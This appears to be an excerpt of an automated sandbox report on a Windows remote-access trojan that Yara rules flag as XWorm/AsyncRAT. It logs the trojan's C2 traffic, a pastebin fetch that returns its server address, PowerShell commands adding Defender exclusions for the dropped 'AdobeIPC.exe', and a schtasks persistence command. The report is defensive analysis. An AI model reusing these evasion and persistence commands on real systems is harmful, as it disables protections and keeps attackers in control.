Oct 13, 2024 19:08:57.428759098 CEST	50025	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:57.435609102 CEST	50025	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:57.436805010 CEST	50026	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:57.441808939 CEST	46070	50025	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:57.441821098 CEST	46070	50026	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:57.441904068 CEST	50026	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:57.458235025 CEST	50026	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:57.463974953 CEST	46070	50026	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:59.158504009 CEST	46070	50026	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:59.159666061 CEST	50026	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:59.514096975 CEST	50026	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:59.515908957 CEST	50027	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:59.518992901 CEST	46070	50026	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:59.520751953 CEST	46070	50027	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:59.520853996 CEST	50027	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:59.534617901 CEST	50027	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:59.539477110 CEST	46070	50027	193.161.193.99	192.168.2.4
Oct 13, 2024 19:09:01.207890987 CEST	46070	50027	193.161.193.99	192.168.2.4
Oct 13, 2024 19:09:01.207946062 CEST	50027	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:09:01.248013973 CEST	50027	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:09:01.248933077 CEST	50028	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:09:01.253036976 CEST	46070	50027	193.161.193.99	192.168.2.4
Oct 13, 2024 19:09:01.253995895 CEST	46070	50028	193.161.193.99	192.168.2.4
Oct 13, 2024 19:09:01.254081964 CEST	50028	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:09:01.268142939 CEST	50028	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:09:01.273138046 CEST	46070	50028	193.161.193.99	192.168.2.4
Oct 13, 2024 19:09:02.913769007 CEST	46070	50028	193.161.193.99	192.168.2.4
Oct 13, 2024 19:09:02.915201902 CEST	50028	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:09:02.936456919 CEST	50028	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:09:02.938921928 CEST	50029	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:09:02.941498041 CEST	46070	50028	193.161.193.99	192.168.2.4
Oct 13, 2024 19:09:02.943794966 CEST	46070	50029	193.161.193.99	192.168.2.4
Oct 13, 2024 19:09:02.943864107 CEST	50029	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:09:02.984085083 CEST	50029	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:09:02.989654064 CEST	46070	50029	193.161.193.99	192.168.2.4
Oct 13, 2024 19:09:04.598757982 CEST	46070	50029	193.161.193.99	192.168.2.4
Oct 13, 2024 19:09:04.598887920 CEST	50029	46070	192.168.2.4	193.161.193.99

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 19:07:59.426501036 CEST	50209	53	192.168.2.4	1.1.1.1
Oct 13, 2024 19:07:59.433760881 CEST	53	50209	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 13, 2024 19:07:59.426501036 CEST	192.168.2.4	1.1.1.1	0xfeeb	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 13, 2024 19:07:59.433760881 CEST	1.1.1.1	192.168.2.4	0xfeeb	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Oct 13, 2024 19:07:59.433760881 CEST	1.1.1.1	192.168.2.4	0xfeeb	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
Oct 13, 2024 19:07:59.433760881 CEST	1.1.1.1	192.168.2.4	0xfeeb	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49768	172.67.19.24	443	7364	C:\ProgramData\AdobeIPC.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 17:07:59 UTC	74	OUT	GET /raw/LsuynkUz HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-10-13 17:08:00 UTC	388	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 17:08:00 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Sun, 13 Oct 2024 17:08:00 GMT Server: cloudflare CF-RAY: 8d20eddc3f868ccc-EWR
2024-10-13 17:08:00 UTC	26	IN	Data Raw: 31 34 0d 0a 31 39 33 2e 31 36 31 2e 31 39 33 2e 39 39 3a 34 36 30 37 30 0d 0a Data Ascii: 14193.161.193.99:46070
2024-10-13 17:08:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	13:06:59
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\jcMcDQ11pZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\jcMcDQ11pZ.exe"
Imagebase:	0x380000
File size:	2'523'648 bytes
MD5 hash:	D68DBA883125D1A3408E13B84A3524E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:07:00
Start date:	13/10/2024
Path:	C:\ProgramData\Stellar Generator.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Stellar Generator.exe"
Imagebase:	0x920000
File size:	253'440 bytes
MD5 hash:	6B7FCE17300B729CA1C919AE47DB6C7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 54%, ReversingLabs Detection: 35%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	13:07:00
Start date:	13/10/2024
Path:	C:\ProgramData\AdobeIPC.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\AdobeIPC.exe"
Imagebase:	0xaf0000
File size:	67'072 bytes
MD5 hash:	1F1441F1CC6080CF821CFDA93BD05E97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1711447769.0000000000AF2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1711447769.0000000000AF2000.00000002.00000001.01000000.00000009.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\AdobeIPC.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\AdobeIPC.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs Detection: 66%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	13:07:04
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:07:04
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:07:13
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AdobeIPC.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:07:13
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x800000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:07:24
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:07:24
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:07:37
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AdobeIPC'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:07:37
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	13:07:58
Start date:	13/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AdobeIPC" /tr "C:\ProgramData\AdobeIPC"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:07:58
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	13:08:00
Start date:	13/10/2024
Path:	C:\ProgramData\AdobeIPC
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\AdobeIPC
Imagebase:	0xb10000
File size:	67'072 bytes
MD5 hash:	1F1441F1CC6080CF821CFDA93BD05E97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\AdobeIPC, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\AdobeIPC, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs Detection: 66%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:08:08
Start date:	13/10/2024
Path:	C:\ProgramData\AdobeIPC.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\AdobeIPC.exe"
Imagebase:	0xc0000
File size:	67'072 bytes
MD5 hash:	1F1441F1CC6080CF821CFDA93BD05E97
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:08:16
Start date:	13/10/2024
Path:	C:\ProgramData\AdobeIPC.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\AdobeIPC.exe"
Imagebase:	0xa70000
File size:	67'072 bytes
MD5 hash:	1F1441F1CC6080CF821CFDA93BD05E97
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	13:09:00
Start date:	13/10/2024
Path:	C:\ProgramData\AdobeIPC
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\AdobeIPC
Imagebase:	0x730000
File size:	67'072 bytes
MD5 hash:	1F1441F1CC6080CF821CFDA93BD05E97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FFD9B7D112D Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716141431.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7d0000_jcMcDQ11pZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208eda88dd6fe87dc7107085c6c006643399e2f2a59aac69e722027b63dec61e
Instruction ID: 114f5e3f9d8fc1400cb4bbedbc5aabe0058da3450b17b31d3bdcef2da9198a03
Opcode Fuzzy Hash: 208eda88dd6fe87dc7107085c6c006643399e2f2a59aac69e722027b63dec61e
Instruction Fuzzy Hash: 8D31F621B0DA894FDB95EB6848796B87BE1EFA9345B0901BBE04DC72E3DD14AC058741

Function 00007FFD9B7D0A37 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716141431.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7d0000_jcMcDQ11pZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bcd5e805257c031f044ee00e4401cb24f8d5baf62f35b586efdec539cc81576
Instruction ID: afa3f36a3cd9beb3d36be989d161876548ed7ee3517a7a301fb615fdeb55da50
Opcode Fuzzy Hash: 5bcd5e805257c031f044ee00e4401cb24f8d5baf62f35b586efdec539cc81576
Instruction Fuzzy Hash: E9717230B1990D8FDB54EB68C4A8BAD77E2FF94304F514668D05AC32E5DF34A946CB44

Function 00007FFD9B7D0DC0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716141431.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7d0000_jcMcDQ11pZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e567234fa84fb2472a983939893636d7a2decfce1096340f4139e8fa26021a
Instruction ID: 29b62cd1d0c9960d8a81787b17907bb5e790787904a4008dc5b3db3e9804f4e3
Opcode Fuzzy Hash: 73e567234fa84fb2472a983939893636d7a2decfce1096340f4139e8fa26021a
Instruction Fuzzy Hash: 1D31786244E3C61FC31367B45C764A17FB09E8722070A42EBD4C8CB4E3D50C6A4AC362

Function 00007FFD9B7D0FC1 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716141431.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7d0000_jcMcDQ11pZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b875997d34c55c3d8b37099c81519e1f0f9166c3ffa483954f2b0e6dd7346670
Instruction ID: 58ac79c94cb0bd072d2cf9b40f28b7e1ce571ba5932e02e45d2993303d205aab
Opcode Fuzzy Hash: b875997d34c55c3d8b37099c81519e1f0f9166c3ffa483954f2b0e6dd7346670
Instruction Fuzzy Hash: 94312742A0F7C61FE72616B458364A47FA0AF9379075A07F7C0D8864F7D9186A0E8391

Function 00007FFD9B7D0498 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716141431.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7d0000_jcMcDQ11pZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd057aa2089711d702cb379e740da65bf938dbce4d3c9dce0b2db9eaa491ba18
Instruction ID: ba48a9dc143a94d0f0b25e641705c97032e52d1875793a162a1f1b0dcc0fad69
Opcode Fuzzy Hash: dd057aa2089711d702cb379e740da65bf938dbce4d3c9dce0b2db9eaa491ba18
Instruction Fuzzy Hash: 2521B631B1990D4FDB94FF6888A96B977D2EF98345B04057AE40DC36E7DE24AC428740

Function 00007FFD9B7D0F39 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716141431.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7d0000_jcMcDQ11pZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91839409749545f2b956e03bfcc5a4cdc62cfeb8bd701fc6c636a66c573028d5
Instruction ID: 9ccf1a9f41ecaf341f54a67eb70438f1941784f89e8791169a634ab2a9945adb
Opcode Fuzzy Hash: 91839409749545f2b956e03bfcc5a4cdc62cfeb8bd701fc6c636a66c573028d5
Instruction Fuzzy Hash: 97012B02F0E94D0FF3A49EB818B9EB177C1DFD5251B4512B6E44CC32E6DD18AC068350

Function 00007FFD9B7D0995 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716141431.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7d0000_jcMcDQ11pZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37366185da42b96a5e003e3790d2f73e5998956170a1f8036cc717198e854587
Instruction ID: 890e8fab1d8d2cd6e23d4b7b379de895c602f2bc92849e606697ae7b6420aed9
Opcode Fuzzy Hash: 37366185da42b96a5e003e3790d2f73e5998956170a1f8036cc717198e854587
Instruction Fuzzy Hash: 8B11BF70D0AB4C4FEB54CFB4C4A56EDBBF0EF89700F11526AD044A72A2DB74A946CB41

Function 00007FFD9B7D04A0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716141431.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7d0000_jcMcDQ11pZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9f5e1ff12f2ea9c1725ba9f5af02254433cedd0814fad1fb2707d526d2d3c8f
Instruction ID: dd8d1ce7924ef086f7a9fb1b8c0f06375e172c4fc0f412e0c57912a0df9ce2a9
Opcode Fuzzy Hash: d9f5e1ff12f2ea9c1725ba9f5af02254433cedd0814fad1fb2707d526d2d3c8f
Instruction Fuzzy Hash: 9AF0C812F1A90D0BF7A8A9BC28B9AB563C5CBE9665B951236F11DC33E9DC145C428341

Function 00007FFD9B7D0EB1 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716141431.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7d0000_jcMcDQ11pZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e1c82c5fff028d8f3d2b8657156a0ccd2a3a6e50b1375039026273237a5870c
Instruction ID: e227db1315abe145d2417afb83fa7022267ce92975b2434b939a304b475d478b
Opcode Fuzzy Hash: 8e1c82c5fff028d8f3d2b8657156a0ccd2a3a6e50b1375039026273237a5870c
Instruction Fuzzy Hash: 1B012630B2D7494FC754AB7898A15A633D1EF88314F41067AD44DC32D9DE2CE9028782

Function 00007FFD9B7D04A8 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716141431.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7d0000_jcMcDQ11pZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 134a2a26e7e8fa2813933d4bfd25c718c167aa17cde80615da54f0d2459b5130
Instruction ID: bf300db11fecd4d8c5ab9c1d6eb830831612a1dd646f5eb87985325e73d9ad0e
Opcode Fuzzy Hash: 134a2a26e7e8fa2813933d4bfd25c718c167aa17cde80615da54f0d2459b5130
Instruction Fuzzy Hash: C0F0F920F2D65D4BD724AA7C686197A73D1EFC8304F510679D40DC32D9DD28A8028781

Function 00007FFD9B7D04B0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716141431.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7d0000_jcMcDQ11pZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb674203d828fed3383fe040578c76b78fd3189da37b7925827197668f3eac1d
Instruction ID: 742a4facd41cf01549b29d1b5b578bc8a769d4a227e3d86a6a25c48451240b24
Opcode Fuzzy Hash: cb674203d828fed3383fe040578c76b78fd3189da37b7925827197668f3eac1d
Instruction Fuzzy Hash: 83F0A430B29A1D4BD764AB7CA865A6A72D1EBC8704F510639D40EC33D9DE28A9028786

Analysis Process: Stellar Generator.exePID: 7336, Parent PID: 7284COMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.1%
Total number of Nodes:	638
Total number of Limit Nodes:	44

Executed Functions

Function 05287250 Relevance: 16.0, Strings: 11, Instructions: 2280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-, xrefs: 052879E5
-, xrefs: 05288609
-, xrefs: 05288015
-, xrefs: 05288303
H, xrefs: 05288A45
-, xrefs: 052876CD
,, xrefs: 05288953
$, xrefs: 05288E52
-, xrefs: 05289567
-, xrefs: 05289402
-, xrefs: 05287CFD

Memory Dump Source

Source File: 00000001.00000002.2988456306.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5280000_Stellar Generator.jbxd

Similarity

API ID:
String ID: $$,$-$-$-$-$-$-$-$-$H
API String ID: 0-685955461
Opcode ID: 77008fb9006d12c527fa1940f36d140790551d012431c44c641f0674010aa01b
Instruction ID: 26177ade92dcf662a88a2f66917d7607f211e0e95ba72efb0b32c141efeb056e
Opcode Fuzzy Hash: 77008fb9006d12c527fa1940f36d140790551d012431c44c641f0674010aa01b
Instruction Fuzzy Hash: 3A43F534610615CFCB15DF64C888EA9BBB2FF89305F1585A9E50AAB3B1DB31AD85DF00

Function 05287260 Relevance: 16.0, Strings: 11, Instructions: 2275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-, xrefs: 052879E5
-, xrefs: 05288609
-, xrefs: 05288015
-, xrefs: 05288303
H, xrefs: 05288A45
-, xrefs: 052876CD
,, xrefs: 05288953
$, xrefs: 05288E52
-, xrefs: 05289567
-, xrefs: 05289402
-, xrefs: 05287CFD

Memory Dump Source

Source File: 00000001.00000002.2988456306.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5280000_Stellar Generator.jbxd

Similarity

API ID:
String ID: $$,$-$-$-$-$-$-$-$-$H
API String ID: 0-685955461
Opcode ID: 9853dcf3c76c127472b7237563e4c9bdd76394bdece19d67a4a75b43615cf9f8
Instruction ID: adb4d5ee27ba86a52d6f81a048322651d09f1b6769388fecee00437bd1d10cdb
Opcode Fuzzy Hash: 9853dcf3c76c127472b7237563e4c9bdd76394bdece19d67a4a75b43615cf9f8
Instruction Fuzzy Hash: C543F534610615CFCB15DF64C888EA9BBB2FF89305F1585A9E50AAB3B1DB31AD85DF00

Function 05849194 Relevance: 6.9, Strings: 5, Instructions: 649
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 0584C431
Hbq, xrefs: 0584C54B
Hbq, xrefs: 0584C5D5
Hbq, xrefs: 0584C693
Hbq, xrefs: 0584C4C4

Memory Dump Source

Source File: 00000001.00000002.2993420870.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5840000_Stellar Generator.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq$Hbq$Hbq
API String ID: 0-1677660839
Opcode ID: 300e76907f4f7a8b24d2aad2c3dd0de336d6472389d0afe9d7a52283faa9aac5
Instruction ID: fcb6dffdf297e1860d3a6400df7f367a6d02d8f08c5c4eabcc07b5b5ebeb6ee5
Opcode Fuzzy Hash: 300e76907f4f7a8b24d2aad2c3dd0de336d6472389d0afe9d7a52283faa9aac5
Instruction Fuzzy Hash: 90426F30A002588FDB54DFA8C8947AEBBF6BF88300F1485AAD849EB355DB349D45CF95

Function 07941FB8 Relevance: 5.3, Strings: 4, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 07942102
(&^q, xrefs: 07942289
Hbq, xrefs: 0794212E
, xrefs: 07942054

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID: $(&^q$(bq$Hbq
API String ID: 0-1723523991
Opcode ID: f6f9d5e2c946737d24ae4acfd2fe1d36449d6ef124419ad7ef55d3119fb2faba
Instruction ID: c9b7ea282432815ee458bcd604dac1379d9d13c8f0b0fbc0a7ed1b8914e2ef3a
Opcode Fuzzy Hash: f6f9d5e2c946737d24ae4acfd2fe1d36449d6ef124419ad7ef55d3119fb2faba
Instruction Fuzzy Hash: 1A919FB1E002199FCB18DF69C8549AFBBF6FF88304F10852AE405EB254DF759941CBA5

Function 05286D38 Relevance: 2.8, Strings: 2, Instructions: 321
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#, xrefs: 0528D694
#, xrefs: 0528D72E

Memory Dump Source

